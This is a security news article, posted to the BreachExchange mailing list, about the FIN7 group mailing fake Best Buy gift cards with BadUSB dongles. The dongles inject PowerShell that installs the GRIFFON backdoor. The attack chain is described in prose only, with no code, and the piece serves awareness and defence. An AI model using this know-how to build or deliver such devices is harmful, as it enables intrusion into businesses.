[BreachExchange] Cybercriminal group mails malicious USB dongles to targeted companies

Destry Winant destry at riskbasedsecurity.com
Wed Apr 1 10:21:34 EDT 2020


Security researchers have come across an attack where an USB dongle
designed to surreptitiously behave like a keyboard was mailed to a
company under the guise of a Best Buy gift card. This technique has
been used by security professionals during physical penetration
testing engagements in the past, but it has very rarely been observed
in the wild. This time it's a known sophisticated cybercriminal group
who is likely behind it.

The attack was analyzed and disclosed by security researchers from
Trustwave SpiderLabs, who learned about it from the business associate
of one of their team members. Ziv Mador, vice president for security
research Trustwave SpiderLabs, tells CSO that a US company in the
hospitality sector received the USB sometime in mid-February.

The package contained an official-looking letter with Best Buy's logo
and other branding elements informing the recipient that they've
received a $50 gift card for being a regular customer. "You can spend
it on any product from the list of items presented on an USB stick,"
the letter read. Fortunately, the USB dongle was never inserted into
any computers and was passed along for analysis, because the person
who received it had security training.

The BadUSB

Researchers traced the USB dongle model to a Taiwanese website where
it's being sold for the equivalent of $7 under the name BadUSB
Leonardo USB ATMEGA32U4. In 2014, at the Black Hat USA security
conference, a team of researchers from Berlin-based Security Research
Labs (SRLabs) demonstrated that the firmware of many USB dongles can
be reprogrammed so that, when inserted in a computer, it reports that
it's actually a keyboard and starts sending commands that could be
used to deploy malware. The researchers dubbed this attack BadUSB and
it's different then just putting malware on an USB stick and relying
on the user to open it.

The Leonardo USB device that Trustwave received and analyzed has an
Arduino ATMEGA32U4 microcontroller inside which was programmed to act
as a virtual keyboard and execute an obfuscated PowerShell script via
the command line. The script reaches out to a domain set up by the
attackers and downloads a secondary PowerShell payload that then
deploys a third JavaScript-based payload that is executed through
Windows' built-in script host engine.

This third JavaScript payload generates a unique identifier for the
computer and registers it to a remote command-and-control server. It
then receives additional obfuscated JavaScript code from the server
which it executes. The goal of this fourth payload is to gather
information about the system, such as the user's privilege, the domain
name, time zone, language, OS and hardware information, a list of
running processes, whether Microsoft Office and Adobe Acrobat are
installed and more.

After this intelligence gathering routine, the JavaScript backdoor
enters a loop that periodically checks in with the server for see if
there are new commands to execute.

"The fact that they are also cheap and readily available to anyone
meant that it was just a matter of time to see this technique used by
criminals in the wild," the Trustwave researchers said in their
report. "Since USB devices are ubiquitous, used and seen everywhere,
some consider them innocuous and safe. Others can be very curious
about the contents of an unknown USB device. If this story teaches us
anything, it's that one should never trust such a device."

FIN7 connection

Mador tells CSO that his team didn't know who the attackers were, but
after seeing the information in Trustwave's report, security
researchers Costin Raiu from Kaspersky Lab and Michael Yip commented
on Twitter that the malware used and infrastructure match that used by
the FIN7 gang.

FIN7, also known as Carbanak, is a financially motivated cybercriminal
group that has been targeting US-based companies from the retail,
restaurant and hospitality sectors since around 2015. The group is
known for using sophisticated techniques to move laterally inside
networks and compromised systems with the goal of stealing payment
card information. Researchers from security firm Morphisec estimated
in the past that FIN7 members earn around $50 million a month from
their activities.

The target in the BadUSB attack was a company from the US hospitality
sector which is in line with FIN7's previous targeting, but while the
malware (GRIFFON) and infrastructure match FIN7, Raiu tells CSO that
it's the first time he's seen the group use this physical USB
dongle-based attack vector.

"We expect that this campaign dates back to at least December 2019,
based on submissions we observed in VirusTotal," Barry Vengerik,
technical director of Technical Operations and Reverse Engineering
(TORE) at FireEye, tells CSO. "FireEye Intelligence has been tracking
FIN7 sending US-based organizations packages via USPS that contained
USB devices configured to deliver malware. When the USB device is
connected to a PC, it functions as a virtual keyboard, launching an
instance of cmd.exe and executing a PowerShell command crafted to
download a remotely hosted PowerShell script designed to launch an
instance of the GRIFFON backdoor."

The FBI also sent a private alert to companies on Thursday confirming
that FIN7 is behind these physical USB-based attacks. The agency said
it received reports of several packages that contained items including
malicious USB devices that were sent to businesses from the retail,
restaurant and hotel industries via USPS. The alert contains more
technical details, pictures of the packages and USB devices, as well
as recommendations to businesses on what information to report back to
the FBI in case they're targeted.

More BadUSB attacks on the way?

Attacks involving USB dongles reprogrammed to act as keyboards have
not been used widely until now because they're not very scalable. One
such dongle that's popular with penetration testers is the USB Rubber
Ducky. It's made by a company called Hak5 and costs $50, which is not
a lot of money for a professional to spend, but adds up quickly if
you're an attacker and want to infect many victims, especially since
the success rate won't be 100 percent.

However, at $7 apiece (and probably less if bought in large
quantities), malicious dongles like the BadUSB Leonardo device make
real-word BadUSB attacks much more viable. Attackers don't even have
to put in much effort, like to create custom firmware to convert
off-the-shelf non-malicious USB sticks into malicious ones. They just
need to load their custom payload into a ready-made device and mail

Even so, attacks of this type are expected to target a relatively
small number of carefully selected companies that attackers have
already done some research on. According to Trustwave's Mador, the
choice of impersonating Best Buy might not have been an accident.
Attackers can use online information to find a company's contractors
and suppliers.

Also, in this case, the rogue letter was sent to the business's
address, but with senior and other key employees now working from home
due to the COVID-19 pandemic the risk is even higher.

At work such letters would probably be received by administrative
staff, who might then take the device to the IT or security team if
they've been trained properly, so several people might look at the
device before it's being used, Mador says. However, at home there is
no security staff and even if the intended recipient received security
awareness training at work, the device might be found and used by one
of their family members before they have a chance to stop it.

If hackers compromise a device on the victim's home network, they'll
eventually succeed to hack into their work computer as well, which
will probably provide them with access to the company's network or
systems via a VPN connection. That's why security professionals are
concerned about the forced work-from-home situation that's currently
in effect.

"People know by now that they shouldn't click on links or open
attachments from unknown or untrusted sources," Mador says. "But when
it comes to USB dongles, many still don't use the right judgement."

More information about the BreachExchange mailing list